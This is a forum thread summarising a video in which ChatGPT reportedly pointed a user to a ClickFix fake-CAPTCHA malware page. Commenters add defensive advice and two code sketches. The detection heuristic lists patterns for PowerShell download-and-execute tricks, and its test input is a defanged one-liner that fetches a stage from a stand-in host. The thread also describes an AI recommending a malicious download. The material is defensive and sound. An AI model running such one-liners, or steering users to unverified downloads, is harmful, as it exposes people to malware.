App Review: ChatGPT Now Recommends Malware?

It is advised to take all reviews with a grain of salt. In extreme cases, some reviews use dramatization for entertainment purposes.
Content created by Eric Parker

Thread author: Khushal
Apr 4, 2024

### Summary

In this video, Eric explores a recent and concerning example of how AI-generated content, specifically from ChatGPT’s free model, can inadvertently facilitate malware distribution. The core incident involves a user querying ChatGPT for a good OCR (Optical Character Recognition) tool for Windows. Instead of recommending legitimate software, ChatGPT, influenced by biased or manipulated online content, returned a malicious link that led to a **social-engineering malware attack known as "ClickFix."**

Eric demonstrates how this malware operates, including its infection vector and payload delivery, and discusses the broader implications of AI’s role in cybersecurity vulnerabilities.

---

### Key Insights and Findings

- **ChatGPT Free Model’s Limitations:**
The free version of ChatGPT is locked to a default model that may provide less accurate or even dangerous advice, unlike paid tiers, which allow switching between models for better results.

- **Malware Distribution via AI Responses:**
The user’s query about OCR tools was met with a malicious reply directing them to a **fraudulent GitHub repository**, which actually hosted malware disguised behind a fake CAPTCHA ("ClickFix attack").

- **ClickFix Attack Characteristics:**
- Instructs victims to use Windows shortcut keys (e.g., Win+R) to launch PowerShell commands pasted from the clipboard.
- Deploys obfuscated PowerShell scripts that abuse the Windows Task Scheduler and use evasion techniques such as sleep delays and hidden payloads.
- Connects to **blockchain-based hosting (Binance Smart Chain)** as a bulletproof command and control (C2) infrastructure, leveraging its low fees and decentralized nature.
- Supports multiple platforms (Windows primarily, with some Linux and Mac targeting), though payloads differ by platform and attacker configuration.
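The Binance Smart Chain point above can be made concrete: a campaign can store its next-stage URL as a string in a smart contract, and any client can read it back with an ordinary `eth_call`, which makes takedown very hard. The sketch below (function names and the defanged placeholder URL are mine, not real campaign data) shows the decoding step an analyst performs on the ABI-encoded string such a call returns.

```python
# Sketch: decoding an ABI-encoded string, the format an eth_call returns
# when a contract function hands back a stored string (e.g., a next-stage
# URL in a ClickFix-style chain). All names and sample data are illustrative.

def encode_abi_string(s: str) -> bytes:
    """Build the ABI return blob for one string: offset word, length word, padded data."""
    raw = s.encode()
    padded = raw + b"\x00" * (-len(raw) % 32)  # right-pad to a 32-byte word
    return (32).to_bytes(32, "big") + len(raw).to_bytes(32, "big") + padded

def decode_abi_string(blob: bytes) -> str:
    """Recover the string: read the offset, then the length, then the data."""
    offset = int.from_bytes(blob[0:32], "big")          # where the string head starts
    length = int.from_bytes(blob[offset:offset + 32], "big")
    start = offset + 32
    return blob[start:start + length].decode()

# Round-trip with a defanged placeholder URL (not a real indicator):
blob = encode_abi_string("hxxps://example[.]com/stage2")
print(decode_abi_string(blob))  # hxxps://example[.]com/stage2
```

The same decoding applies whether the blob came from a live RPC call or from a packet capture, which is why defenders can read these "C2 records" just as easily as the malware can.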

- **Malware-as-a-Service (MaaS):**
The ClickFix system is sold as a service, allowing cybercriminals to customize payloads including fake blue screens, fake browser updates, or fake Cloudflare blocks, depending on the victim's OS and browser.

- **Sandbox Testing Results:**
Testing on various virtual machines (Windows, Linux, Mac) showed different behaviors, such as payload delivery or glitching of browser windows, depending on the OS and sandbox environment.

- **AI and Malware Intersection:**
Eric presents this as the **first observed case of a modern large language model (LLM) organically providing malware installation instructions** (not through poisoned ads, but via its knowledge base/context). It highlights AI’s lack of cybersecurity common sense.

- **Search Engines vs. AI Responses:**
In comparison, Google and Bing gave mixed results:
- Google performed better in identifying the official site.
- Bing ranked the malicious site as legitimate; the video speculates this may relate to Microsoft’s relationship with OpenAI.
- Google’s AI Overview correctly recognized the scam.

- **Recommendations and Warnings:**
- Do not trust AI or search engines blindly for software recommendations, especially security-related tools.
- Any prompt to download code, execute scripts, or install browser extensions as part of a CAPTCHA or update should be treated as a **red flag for scams or malware**.
- Endpoint protection tools like **ThreatLocker** can mitigate such attacks by restricting unauthorized application behaviors, such as PowerShell misuse.

---

### Timeline of Key Events

| Timecode | Event Description |
|----------------|------------------------------------------------------------------------------------------------------------|
| 00:00:00-00:00:55 | Introduction: Eric receives an intriguing malware-related query from a user involving ChatGPT. |
| 00:00:56-00:02:01 | User requests OCR tool recommendation from ChatGPT (free model); receives suspicious/malicious advice. |
| 00:02:01-00:03:21 | Overview of ClickFix malware infection sequence and introduction of ThreatLocker sponsor message. |
| 00:03:22-00:05:27 | Testing malware in sandbox environments (Windows VM, Linux); observing payload behaviors and infection. |
| 00:05:28-00:08:22 | Further sandbox tests on Mac, Linux; discussion of malware-as-a-service and multi-OS payload capabilities. |
| 00:08:23-00:10:06 | Exploration of blockchain use (Binance Smart Chain) for hosting malware payloads; AI’s inconsistent advice. |
| 00:10:07-00:12:04 | Comparison of search engines’ site legitimacy detection; Bing’s poor ranking of malicious site noted. |
| 00:12:05-00:15:59 | Technical malware analysis: PowerShell script, task scheduler, reverse C2 shell, and blockchain-based C2. |
| 00:16:00-00:17:57 | Summary of malware distribution methods including Google ads, SEO, and AI-generated content manipulation. |
| 00:17:58-00:18:50 | Final warnings regarding AI and search engine trustworthiness; advice to avoid executing suspicious code. |

---

### Technical Concepts and Definitions

| Term | Definition |
|--------------------------|----------------------------------------------------------------------------------------------------|
| ClickFix | Malware attack using fake CAPTCHA to trick users into running malicious PowerShell scripts. |
| OCR (Optical Character Recognition) | Software that converts images of text into machine-encoded text. |
| Malware-as-a-Service (MaaS) | A business model where malware tools and infrastructure are sold or rented to cybercriminals. |
| Reverse C2 Shell | A type of command and control communication where the infected machine connects back to the attacker.|
| Binance Smart Chain | A blockchain platform used here as decentralized, bulletproof hosting for malware payloads. |
| Endpoint Detection and Response (EDR) | Security tools designed to detect, analyze, and block cyber threats on endpoints like PCs and servers.|

---

### Core Conclusions

- **AI tools, especially free LLM versions, can inadvertently recommend malicious sites due to their reliance on biased or manipulated data, lacking cybersecurity judgment.**
- **ClickFix malware uses sophisticated evasion and multi-platform payload delivery, leveraging blockchain for C2 resilience.**
- **AI and search engine results must be critically evaluated, particularly for cybersecurity-related queries.**
- **Defensive measures like ThreatLocker’s endpoint protection are essential to block malicious payload execution and contain such AI-driven attack vectors.**
- **Users should never trust or execute code that comes disguised as legitimate CAPTCHA or update prompts.**

---

### Recommendations for Users and Security Professionals

- Always verify software sources through trusted official channels, not AI-generated answers alone.
- Use robust endpoint protection with application control and ring-fencing capabilities.
- Educate users to recognize social engineering tactics such as fake CAPTCHAs or update prompts requiring code execution.
- Monitor AI tools for potential security risks and apply caution when incorporating AI recommendations into operational decisions.

---

### Keywords

- ChatGPT, AI, malware distribution, ClickFix, PowerShell, OCR tools, malware-as-a-service, blockchain C2, endpoint protection, Threat Locker, cybersecurity, phishing, sandbox analysis, Binance Smart Chain, reverse C2 shell, AI misinformation.
---
This is a good write-up of a broader problem: “AI as a software recommender” can become an amplification layer for SEO poisoning and social engineering, even when the original user intent is harmless (e.g., “recommend an OCR tool”).

What’s important (and generally accurate) about the ClickFix angle
ClickFix-style campaigns are primarily about getting the user to execute something “by themselves,” typically via a fake CAPTCHA / fake block page that instructs copy/paste + Run, which then launches PowerShell and pulls the next stage. That technique is effective because it bypasses a lot of “drive-by download” expectations and leans on user trust and muscle memory.

Where I’d be careful with claims in the summary
  • “Free model vs paid model = safe vs unsafe”: model tier doesn’t reliably map to “security correctness.” Any LLM can surface bad advice if it’s pulling from poisoned narratives or if it hallucinates. Treat all AI output as untrusted, especially links and “download this” instructions.
  • “First observed case of an LLM providing malware instructions organically”: I can’t verify “first” without sources, and historically there have been many examples of chatbots producing harmful instructions/code. This incident is still notable because it shows how a normal “what OCR tool should I use?” query can be steered into a malware path.
  • Attributing Bing results to vendor relationships: that’s speculation. Search ranking failures happen for lots of reasons (SEO abuse, compromised sites, weak reputation signals, etc.). It’s better to frame it as “search results can be poisoned” rather than “because of X relationship.”

Practical takeaway for MalwareTips readers: treat “link recommendations” as untrusted input
A safe workflow when AI/search suggests software (OCR tools, drivers, cleaners, etc.):

  • Do not click AI-provided links blindly. Instead, search the vendor name yourself and confirm the official domain.
  • Prefer built-in / reputable sources: Microsoft Store, vendor’s official site, or well-known vendors. (For OCR on Windows, examples many people use include Microsoft OneNote OCR, PowerToys “Text Extractor,” Adobe Acrobat OCR, ABBYY FineReader, and Tesseract from its official project—still verify the publisher/source before installing.)
  • Red flags = “CAPTCHA/update requires running commands”. Any page telling you to press Win+R, paste from clipboard, run PowerShell/Terminal, install an extension, or “fix verification” is a stop sign.
  • Verify before running: check digital signature (where applicable), scan with your AV, and if you must, submit the file/URL to VirusTotal and wait for community/vendor analysis (keeping in mind false positives can happen).
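For the "verify before running" step, one cheap local habit is to hash the download and search for that hash (e.g., on VirusTotal) before executing anything. A minimal sketch; the installer filename is hypothetical:

```python
import hashlib
from pathlib import Path

def sha256_of(path: str, chunk_size: int = 1 << 20) -> str:
    """Stream the file in chunks so large installers never load fully into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        while chunk := fh.read(chunk_size):
            digest.update(chunk)
    return digest.hexdigest()

# Hypothetical downloaded installer; search this hash on VirusTotal
# instead of uploading (faster, and avoids sharing private files).
installer = Path("ocr-tool-setup.exe")
if installer.exists():
    print(sha256_of(str(installer)))
```

Searching by hash also sidesteps the temptation to run the file "just to see": if the hash is unknown to every vendor, that is a reason for more caution, not less.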

Defender/EDR-side mitigations that help against ClickFix-style chains
  • Application control / allowlisting (WDAC, AppLocker, or third-party such as ThreatLocker) to limit script interpreters and unknown binaries.
  • PowerShell hardening: disable PowerShell v2, enable script block logging, and restrict who can run PowerShell where feasible.
  • Microsoft Defender Attack Surface Reduction (ASR) rules (where available) to reduce common script-and-living-off-the-land abuse paths.
  • Browser protections: SmartScreen, reputation-based blocking, and (in orgs) DNS/web filtering.
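As a toy illustration of the "restrict script interpreters" idea, here is a minimal heuristic (my own patterns and function names, not a production detection and certainly not a replacement for WDAC/AppLocker/ASR) that flags process command lines with traits common to ClickFix-style PowerShell launches:

```python
import re

# Illustrative-only indicators often seen in ClickFix-style one-liners:
# hidden windows, encoded commands, and in-memory download-and-execute.
SUSPICIOUS_PATTERNS = [
    r"-w(indowstyle)?\s+hidden",                      # hide the console from the victim
    r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",   # base64-encoded payload
    r"\biex\b",                                       # Invoke-Expression alias
    r"downloadstring|downloadfile",                   # in-memory fetch of next stage
    r"-nop\b",                                        # -NoProfile, common in one-liners
]

def looks_suspicious(cmdline: str) -> bool:
    """Return True if a PowerShell command line matches any illustrative indicator."""
    lowered = cmdline.lower()
    if "powershell" not in lowered and "pwsh" not in lowered:
        return False
    return any(re.search(pattern, lowered) for pattern in SUSPICIOUS_PATTERNS)

print(looks_suspicious(
    "powershell -nop -w hidden -c iex (New-Object Net.WebClient)"
    ".DownloadString('hxxp://example[.]com/a')"
))  # True
print(looks_suspicious("powershell -File backup.ps1"))  # False
```

Real EDRs combine signals like these with parent-process lineage (e.g., a browser spawning PowerShell) rather than matching strings alone, which is why allowlisting the interpreter outright is the stronger control.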

Bottom line
The “AI recommended a malicious path” part is credible as a risk pattern: AI and search can be manipulated, and ClickFix succeeds by pushing users to execute commands themselves. The safest stance is to treat AI-generated links and “run this command” guidance as hostile until independently verified via official sources and standard security checks.
---
Recognize that AI is just processing the web on steroids and shouldn't be implicitly trusted for cybersecurity. But for the average user who assumes AI acts as a filtered, safe intermediary, the article's core advice is a necessary reality check: always verify the output and run good endpoint protection.
---
An AI recommending malware is proof that “digital common sense” cannot be outsourced. If an assistant invites us to install shady stuff or run commands, the right answer is to shut the door. Security remains a fortress we must guard ourselves, not an automatic scout. 🔒🧭🚪